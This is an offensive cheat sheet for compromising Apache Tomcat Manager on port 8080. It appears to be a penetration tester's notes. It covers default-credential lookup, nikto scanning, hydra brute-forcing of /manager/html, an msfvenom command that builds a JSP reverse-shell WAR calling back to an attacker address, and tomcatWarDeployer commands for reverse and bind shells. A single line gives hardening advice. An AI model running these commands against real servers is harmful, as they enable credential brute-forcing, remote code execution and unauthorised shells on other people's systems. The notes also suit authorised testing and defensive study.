Tomcat 8080
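#Default port 8080
#Check the default directories /manager and /manager/html
#Default creds list https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown
#Hardening: everything below depends on a reachable Manager app with default or weak credentials; remove stock accounts from tomcat-users.xml and restrict /manager to trusted addresses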
#Run nikto
nikto -h http://10.10.10.10:8080
#Reverse shell to upload
sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.112 LPORT=1234 -f war -o shelly.war
#Hydra
hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.10 http-get /manager/html
#tomcatWarDeployer.py
#Clone as a normal user (root is not needed) and read third-party tooling before running it
git clone https://github.com/mgeeky/tomcatWarDeployer.git
Revshell:
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
Bind shell:
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
#Users.txt
#Default_passwords.txt
#Metasploit Scanner | good for quick username enumeration/bruteforcing